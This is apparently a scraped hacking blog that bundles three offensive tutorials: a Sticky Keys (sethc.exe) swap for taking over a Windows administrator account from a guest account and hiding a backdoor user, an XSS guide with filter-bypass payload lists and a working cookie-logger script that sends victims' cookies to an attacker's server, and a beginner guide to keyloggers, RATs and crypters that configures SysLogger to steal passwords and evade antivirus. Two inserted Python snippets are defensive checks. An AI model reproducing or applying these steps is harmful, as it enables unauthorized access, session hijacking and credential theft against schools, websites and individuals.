*****Hack administrator from Guest account *****
Ever wanted to hack your college PC with a guest account/student account so that you can download with full speed there? Or just wanted to hack your friend’s PC to make him gawk when you tell your success story of hacking? Well, there is a great way of hacking an administrator account from a guest account, by which you can reset the administrator password and get all the privileges an administrator enjoys on Windows. Interested? Read on…
Concept:
Press the Shift key 5 times and the Sticky Keys dialog shows up. This works even at the logon screen. But if we replace sethc.exe, which is responsible for the Sticky Keys dialog, with cmd.exe, and then call sethc.exe by pressing the Shift key 5 times at the logon screen, we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password, even from a guest account.
Prerequisites
Guest account with write access to system32.
Here is how to do that -
* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* Rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system32; when Windows asks about overwriting the file, click Yes.
* Now log out from your guest account and at the user select window, press the Shift key 5 times.
* Instead of the Sticky Keys confirmation dialog, a command prompt with full administrator privileges will open.
* Now type “NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press Enter.
* You will see “The Command completed successfully”; then exit the command prompt and log in as administrator with your new password.
* Congrats, you have hacked admin from a guest account.
Further..
Also, you can further create a new user at the command prompt by typing “NET USER ARMAAN/ADD” where “ARMAAN” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that you created for your admin account and live with your admin account forever
Countermeasures
Disable regedit
Disable Sticky Keys
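A check for the two changes described in this post, added here as an example (it is not part of the original post): it flags a sethc.exe whose contents are identical to cmd.exe, and lists UserList values set to 0, which is what hides an account from the logon screen. The function names, the defaults and the sample `reg query` output are assumptions constructed for the example.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Key named in the post; a DWORD value of 0 under it hides that account
# from the logon screen.
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
                r"\CurrentVersion\Winlogon\SpecialAccounts\UserList")

# Constructed sample of `reg query "<USERLIST_KEY>"` output (not real data).
SAMPLE_REG_OUTPUT = (
    "\n" + USERLIST_KEY + "\n"
    "    ARMAAN    REG_DWORD    0x0\n"
    "    helpdesk    REG_DWORD    0x1\n"
)

# One value line of reg query output: name, type, data.
VALUE_LINE = re.compile(
    r"^\s+(?P<name>.+?)\s+REG_DWORD\s+(?P<data>0x[0-9a-fA-F]+)\s*$")


def sha256_of(path):
    """Hash a file in chunks so large binaries are not loaded whole."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_swapped_binaries(system_dir, watched=("sethc.exe",),
                          interpreters=("cmd.exe",)):
    """Return (watched, interpreter) pairs whose contents are identical."""
    system_dir = Path(system_dir)
    shells = {}
    for name in interpreters:
        candidate = system_dir / name
        if candidate.is_file():
            shells[sha256_of(candidate)] = name
    hits = []
    for name in watched:
        candidate = system_dir / name
        if candidate.is_file():
            match = shells.get(sha256_of(candidate))
            if match:
                hits.append((name, match))
    return hits


def hidden_accounts(reg_query_output):
    """Return account names whose UserList value is 0 (hidden at logon)."""
    names = []
    for line in reg_query_output.splitlines():
        m = VALUE_LINE.match(line)
        if m and int(m.group("data"), 16) == 0:
            names.append(m.group("name"))
    return names


def demo():
    """Run both checks on constructed data: (tampered, clean, hidden)."""
    with tempfile.TemporaryDirectory() as tmp:
        bad, good = Path(tmp, "bad"), Path(tmp, "good")
        for d in (bad, good):
            d.mkdir()
            (d / "cmd.exe").write_bytes(b"constructed cmd.exe image")
        (bad / "sethc.exe").write_bytes(b"constructed cmd.exe image")
        (good / "sethc.exe").write_bytes(b"constructed sethc.exe image")
        return (find_swapped_binaries(bad), find_swapped_binaries(good),
                hidden_accounts(SAMPLE_REG_OUTPUT))


if __name__ == "__main__":
    print(demo())
```

On a real host, pass the System32 directory to `find_swapped_binaries` and the text printed by `reg query` for the UserList key to `hidden_accounts`. The attack depends on the prerequisite stated above, so removing write access to system32 for non-administrators is the underlying fix.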
Sunday, 6 January 2013
Friday, 28 December 2012
Full Ultimate XSS Tutorial
Hello and thanks for reading this tutorial on XSS, written by me. You may be asking as to why I'm creating this tutorial. My inbox has lately been flooding, and I've received a lot of requests on making this tutorial. I've posted my XSS attacks on Google, Facebook, Defense.gov, and other huge sites. I've even exploited HackForums' security with XSS.
What is XSS?
XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into downloading a virus that you've created. Such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used against a site with this attack. I will explain some of the most important terms associated with XSS.
What is HTML and Javascript?
HTML
HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.
Javascript
Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java, is a language that resembles C++, it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages than HTML is. Javascript is used, more in applications outside of webpages. Like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.
XSS: My first attack.
Now, let's start getting into the really good stuff. In this section, I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS, if you know the basics to XSS, you can skip this section, because I doubt you will learn anything that you don't briefly know yet.
Now, our first step, is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries, to test your site for XSS.
Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source as well. You can't just take any script, and edit the full thing. But editing an "onmouseover" script, is definitely an exception. I will be explaining this method of XSS later on, for now, we need the complete basics.
Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar.
So, let's try putting in the most known, BASIC query of all time.
Code:
<script>alert("XSS")</script>
That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blocking the alert. Here's an example of this kind of filter:
Code:
<script>alert("XSS")</script>
Code:
<script>alert( > XSS DETECTED < )</script>
It will block the quotes. So how the hell do we get past that? Well, thankfully there's a way to encrypt the full message :). We will be using a little function called "String.fromCharCode". The name of it pretty much explains it all. It encrypts our text, into ASCII. An example of this encryption, would be like this:
Code:
String.fromCharCode(88,83,83)
Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like:
Code:
<script>alert(String.fromCharCode(88,83,83))</script>
You do NOT need ANY quotes in the simple query like that. So let's put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use:
Code:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot.
XSS: Advanced Methods
Now, in this section I will be sharing some ways to use XSS maliciously against a site. Now, keep in mind all malicious attacks sent over to a system, site, or server, are illegal and you CAN be prosecuted for these actions. So ALWAYS use protection if you're planning on doing something malicious to the site. If you want to make a little alert box pop up, you shouldn't need a Proxy/VPN.
Cookie Stealing/Logging
Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies of the user who access the page to a certain document. The easiest way to do this, would be with a three step process.
First, you should setup a site. Personally, I find http://www.000webhost.com/ the best for uploading malicious code, programs, or anything else. So go ahead and register there.
Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add this code, into it (Just make sure the file name has .php, or else it will not run the PHP code (Which is an enormous problem)).
Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
fclose($fp);
} else {
?>
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
// ==
// URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
// web site you include a credit somewhere on the web site
// with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
// The Javascript escape and unescape functions do not correspond
// with what browsers actually do...
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_.!~*'()"; // RFC2396 Mark characters
var HEX = "0123456789ABCDEF";
var plaintext = str;
var encoded = "";
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == " ") {
encoded += "+"; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( "Unicode Character '"
+ ch
+ "' cannot be encoded using standard URL encoding.\n" +
"(URL encoding only supports 8-bit characters.)\n" +
"A space (+) will be substituted." );
encoded += "+";
} else {
encoded += "%";
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for
return encoded;
};
cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);
< ?php
}
?>
Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin :). To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too.
To Tiny the URL, go to http://www.spam.com/ and just put in the URL. But hold on, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging.
Code:
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it.
Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrator's session. I find Cookie Manager a very useful app for XSS, make sure to download it.
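From the site owner's side, the logger above only receives what `document.cookie` returns, and browsers withhold cookies marked HttpOnly from scripts. The following added example (not part of the original tutorial) computes which cookies an injected script could read from a set of Set-Cookie headers and reports session cookies missing protective attributes; the header values and the `PHPSESSID` session name are constructed assumptions.

```python
def parse_set_cookie(header):
    """Split one Set-Cookie header value into (name, value, attributes)."""
    first, *rest = [part.strip() for part in header.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for part in rest:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def script_visible(headers):
    """Cookie string that document.cookie would expose to an injected script.

    Cookies marked HttpOnly are withheld from scripts by the browser, so
    they are left out here.
    """
    pairs = []
    for header in headers:
        name, value, attrs = parse_set_cookie(header)
        if "httponly" not in attrs:
            pairs.append(f"{name}={value}")
    return "; ".join(pairs)


def missing_flags(headers, session_names=("PHPSESSID",)):
    """Return {cookie name: [missing attributes]} for session cookies."""
    report = {}
    for header in headers:
        name, _, attrs = parse_set_cookie(header)
        if name in session_names:
            missing = [flag for flag in ("HttpOnly", "Secure", "SameSite")
                       if flag.lower() not in attrs]
            if missing:
                report[name] = missing
    return report


# Constructed Set-Cookie values: the weak setting beside the hardened one.
WEAK = [
    "PHPSESSID=constructed123; Path=/",
    "theme=dark; Path=/",
]
HARDENED = [
    "PHPSESSID=constructed123; Path=/; HttpOnly; Secure; SameSite=Lax",
    "theme=dark; Path=/",
]

if __name__ == "__main__":
    for label, headers in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, "| script can read:", script_visible(headers),
              "| missing:", missing_flags(headers))
```

With the hardened headers the session identifier never reaches the script, so a stolen cookie string contains only the non-sensitive `theme` value.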
Defacing
Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a re-direct to your deface page (You should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.)
Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
XSS: Onmouseover
Onmouseover isn't a very exploitable vulnerability. But yet, it is still considered XSS. An onmouseover vulnerability would look something like this:
Code:
onmouseover=prompt1337
We can exploit this, by editing it to:
Code:
onmouseover=alert("XSS")
Very basic vulnerability, but it's getting more noticed, and patched in a lot more websites. Most sites will use Adobe Flash or CSS to do those kind of effects now.
XSS Filter Bypassing Techniques
Sometimes a simple XSS query just won't do the trick. The reason your query isn't working, is because the website has a WAF or Filter set in place. A filter will block as many XSS and SQLi queries as possible. In this case, we're dealing with XSS.
There are many ways on bypassing XSS filters, but I will only explain a few.
Hex Bypassing
With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there's always a solution :) You can change your characters, into Hex. A Hex of a certain character, is basically the character, but in a different format. These should help you out:
> = %3c
< = %3c
/ = %2f
ASCII Bypassing
With an ASCII encryption, we can use the character ". Which is blocked quite a bit. This is one of the most common XSS Filter bypasses of all time. A script that you would need to encrypt, would look like this:
NOT WORKING SCRIPT
Code:
<script>alert("XSS")</script>
WORKING SCRIPT
Code:
<script>alert(String.fromCharCode(88,83,83))</script>
To encrypt your little part of a script, go to this site: http://www.wocares.com/noquote.php I use that site, and find it quite useful.
Case-Sensitive Bypassing
This kind of bypass rarely works, but it's always worth a shot. Some filters are set in place to detect certain strings, however, the filter's strings that are blocked are CASE SENSITIVE. So all we need to do, is execute a script, with different sizes of characters. This bypass, would look like this:
Code:
<ScRiPt>aLeRt("XSS")</ScRiPt>
You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones.
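Why the filters in this section fail and what holds up instead, as an added example that is not part of the original tutorial: a blocklist of the kind described (strip quotes, reject the exact lowercase string `<script>`) is compared with HTML-encoding the value at output time, using three payloads from this page. The filter, the render functions and the inspector class are hypothetical code written for the comparison.

```python
import html
from html.parser import HTMLParser

# Payloads taken from this page.
PAYLOADS = [
    '<script>alert("XSS")</script>',
    '<ScRiPt>aLeRt("XSS")</ScRiPt>',
    '<ScRiPt>alert(String.fromCharCode(88,83,83))</ScRiPt>',
]


def naive_filter(value):
    """Blocklist as described above: strips quotes and rejects the exact
    lowercase string '<script>' (case-sensitive match)."""
    value = value.replace('"', "").replace("'", "")
    return "" if "<script>" in value else value


def render_filtered(query):
    """Search results page that trusts the blocklist and echoes raw HTML."""
    return "<p>Results for: " + naive_filter(query) + "</p>"


def render_encoded(query):
    """Same page with the value HTML-encoded when it is written out."""
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


class Inspector(HTMLParser):
    """Counts script elements and on* handlers a browser would see."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.active = 0
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.active += 1
        self.active += sum(1 for name, _ in attrs if name.startswith("on"))

    def handle_data(self, data):
        self.text.append(data)


def inspect(markup):
    """Return (active content count, visible text) for a piece of HTML."""
    parser = Inspector()
    parser.feed(markup)
    parser.close()
    return parser.active, "".join(parser.text)


def compare(payloads):
    """Rows of (payload, active count after filter, after encoding)."""
    return [(p, inspect(render_filtered(p))[0], inspect(render_encoded(p))[0])
            for p in payloads]


if __name__ == "__main__":
    for payload, filtered, encoded in compare(PAYLOADS):
        print(f"filtered={filtered} encoded={encoded} {payload}")
```

The blocklist stops only the first payload, while encoding leaves no script element for any of them and still displays the user's text unchanged.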
Some XSS Dorks
It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share:
Code:
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
Those dorks are about as basic as they can get, sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks to find a vulnerable site. XSS is a very popular vulnerability. Even in google I found some. Some in HackForums too. XSS isn't a very high-priority, at least not Non-Persistent.
The COMPLETE beginners guide to hacking
Sections:
1) Introduction
2) The hacker manifesto
3) What is hacking?
4) Choosing your path
5) Where should I start?
6) Basic terminology
7) Keylogging
8) RAT's
9) Java Driveby's
10) Crypters
11) Dosing and DDosing, what's the difference?
12) Staying anonymous
13) Proxies
14) VPN's
15) Alternatives, tips and tricks
16) Extending your knowledge
17) Closing section
SECTION 1 – Introduction
Hi there. If you are reading this, you're either an eager to learn beginner hacker, or an upgraded member here to judge my work. Well, in either case, I'm sure you will enjoy this thread and increase your knowledge of hacking. I will be going over ALL the basics of hacking, and a lot more. I've included tutorials as well, so you could say this is an all-in-one guide.
SECTION 2 - The hacker manifesto
The hacker manifesto (also known as the conscience of a hacker) is an essay written by a hacker known as 'The Mentor'. It is often said to give an insight into the psychology of hackers. If you are hoping to start learning the art of hacking, this will certainly give you the right mindset for the job. "The Hacker Manifesto by +++The Mentor+++ Written January 8, 1986 Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. 
They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike."
– Taken from http://www.mithral.com/~beberg/manifesto.html
That is the essay. It's quite impressive isn't it? After reading it you should have an idea of the mindset any hacker should have. I read it about 5 months ago and it has certainly sent me on the right track.
SECTION 3 - What is hacking?
What is hacking? Well, whatishacking.org defines it as "the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker. Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it's not limited to either of them." - Taken from whatishacking.org That's a great definition but in my opinion hacking is much more than that. In my opinion, hacking isn't something you can just 'learn'. It's not just a skill, it's an art. Hacking requires knowledge. Knowledge is power. In order to gain said knowledge, and the power that comes with it, a change of lifestyle is required, along with a certain amount of secrecy. Learning 'how' to hack takes time and dedication. There's no easy way to get better at it. That's right, no shortcuts and it's unlikely you're going to get a helping hand. Like everything else in life, it takes practice. Don't go crying to others if it doesn't work out, just keep calm and carry on. If you are serious about becoming a hacker, you will need to be willing to change your lifestyle, and dedicate yourself to the task. With enough dedication and hard work you will excel at hacking.
SECTION 4 - Choosing your path
Ask any stranger what a hacker is, they will probably give you a really negative answer; identity theft, hacking accounts, stealing, to name a few. The reality is actually quite different. There are a few kinds of hackers, you probably only know about the bad ones. This section should give you a better understanding of the different kinds of hackers, and help you decide which kind you should become.
Black hat hackers: These are the bad guys you always hear about. These are the people giving other hackers a bad name. Black hat hackers are the ones who commit crime. They steal identities, hack accounts, ddos sites and just go about causing havoc.
Grey hat hackers: Grey hats are basically good guys. They still do illegal stuff, but they report it to the person/company they are targeting. So... Basically they do bad stuff and help people to fix it.
White hat hackers: White hat hackers are the good guys. They fix stuff and help people. They don't do illegal stuff. You've probably never heard of an event where a hacker does something good but these guys do that all the time.
Examples of white hat hackers are:
• Technicians
• Cyber security teams
• IT consultants
Now that you have a better understanding of the 'types' of hackers, you need to choose your path. This requires a lot of thinking, because you need to consider the possibilities of each path. Black hat is the easiest path to choose. It's 'fun' and it has the most benefits. It also is the only one that will get you in trouble and maybe even arrested. Grey hat is a slightly more difficult path. You (technically) are a good guy but most people won't see you as such. Grey hats have a hard time because although they are trying to help, the method they are using isn't really that legal. If you do choose to be a Grey hat, be aware that some people won't believe you are really trying to help, and you may still get in trouble. The last and most difficult path is White hat. As I mentioned before, White hats are the good guys. Their job is to help. Becoming a White hat may seem boring but you are helping people, and that should be a reward in itself. The only problem with becoming a White hat is that you will have to start out as a Black hat. I personally would recommend that you start out as a Grey hat. You'll get more out of it.
SECTION 5 - Where should I start?
This is the question that most people ask. I honestly don't think there is any one place to start. Ask around on any forum and people will always tell you to learn to use RAT's and keyloggers. To be honest I wouldn't recommend doing that straight away. I would advise learning the basic terminologies of hacking (see section 6) and trying to get an idea of exactly what everything means. It's really important to understand stuff before you go downloading random hacking programs from the Internet. If you don't know how to use them, or if they are viruses, you only have yourself to blame.
SECTION 6 - Basic terminology
As I mentioned in the previous section, it is important to have a decent amount of knowledge about hacking before you can start. So I've taken the liberty of typing up a list of common terminologies you should know.
Common terminologies:
Ddos - Distributed denial of service attack. This is where a website is flooded with packets of data from multiple sources and the server basically overloads. Ddos attacks are often confused with Dos attacks.
Dos - Denial of service attack. This is where a site is flooded with packets of data from a single source. A Dos isn't as effective as a ddos, but it is a lot easier, as you can Dos straight from cmd.
404 Error - The error you are given when a site is down. If you have attacked a site and don't see this, your attack wasn't successful.
cmd - Command prompt. This is basically MS-Dos, except it's now just a program with some commands rather than an OS. Cmd can be used to perform tasks using commands.
.bat - Batch file extension. This is the file type which is opened in cmd. Most .bat's that you will see online will be malicious. Some are good though.
RAT - Remote Administration Tool. RAT's are the most commonly used tools by beginner hackers. RAT's are favored because they are easy to use and they perform many functions. They also allow control over the infected computer, which makes them very popular.
Slave - A user which has been infected with your keylogger/RAT.
Keylogger - A program which logs the keystrokes of a computer. These are usually the first things that beginner hackers learn to use. They have a lot of functions but they aren't as good as RAT's.
Crypter - A program used to change the hash sum of a malicious program so that it is undetectable by anti-virus programs.
FUD - Fully UnDetectable. A program which is FUD cannot be detected by ANY anti-virus program.
UD - UnDetectable. A program which is UD is mostly undetectable but can be detected by some anti-virus programs.
JDB - Java Driveby. A fake site which contains a java applet. This java applet is used to download and execute (run) a certain program. The slave has to click the 'allow plugin to run' button to start the applet.
Silent Java Driveby - A java driveby that downloads and executes a file without the user seeing any pop-ups. These are more effective than normal java driveby's as they are less suspicious.
Direct link - The direct download link to a certain file. When you download a file from a site (e.g. Mediafire), you are given a download link which redirects you to a page with a download button. However a direct link is a link which leads directly to the file. There is no download button, the download starts straight away.
FTP - File Transfer Protocol. An FTP server is a server used to store and send files.
OS - Operating system
vb - Microsoft Visual Basic. This is a coding language used to make a lot of programs.
.NET - Microsoft .NET framework. This is another coding language made by Microsoft. It is used to create programs.
C/C+/C++/C# - Commonly used coding languages. They are often used to code games.
IP address - The address used to identify your network while on the Internet. Every computer has a different IP address, and therefore every IP address is unique.
VPN - Virtual Private Network. This is a network you can connect to on a computer. It will give you anonymity while online. A VPN will hide your IP address by tricking sites and programs into thinking you are somewhere you are not.
Proxy - A proxy redirects web traffic through a virtual tunnel to another IP address. A proxy is like a VPN but only tricks websites, not the whole computer.
That may seem like a lot of things to remember, but it's not that much considering those are just the basics. Don't let that put you off learning though, once you start to learn one thing, another will follow and so on and so forth.
SECTION 7 - Keylogging
Keylogging is one of the most basic things in hacking. I explained what a keylogger is in section 6. Downloading a good, free keylogger isn't that hard to do. Just search around HackForums and you will find one in about 30 seconds. I would recommend using SysLogger as it is free and really easy to use. It has many features and allows for the logs to be sent via Email or an FTP server. SysLogger has a really nice interface, so you should be able to figure out how to use it. However if you can't figure it out, or would like to know how to use it before getting it, here is a tutorial I typed up a while ago:
Are your friends bothering you? Need to get back at someone? Or do you just want to learn some of the basics of hacking accounts? In any case, this thread will be INCREDIBLY useful to you.
First of all, here's what this method will require and what it will involve:
- Computer (duhh)
- Internet connection
- Keylogger, we will be using one called SysLogger
- Target
- Making a fake program that the target will want to open
- An email (preferably a Gmail)
So, let's get started.
First thing you will need is SysLogger. You can download it at the bottom of the thread.
Open it up. You will be given a message, just click 'OK'.
![[Image: blAuM.png]](http://i.imgur.com/blAuM.png)
It should open up the GUI.
![[Image: iMtab.png]](http://i.imgur.com/iMtab.png)
Tick the following boxes:
- Encrypt email
- Stealers
- Delete cookies
- Block AV sites
- USB spread
- Startup
- Kill Taskman (optional, leave blank if you want this to be more stealthy)
- Force steam
- Clipboard logger
- Screen logger
![[Image: tvzP9.png]](http://i.imgur.com/tvzP9.png)
Those options will do the following:
Stealers = Sends you saved passwords for internet browsers
Block AV site = Stops the slave from checking an antivirus site if they get suspicious
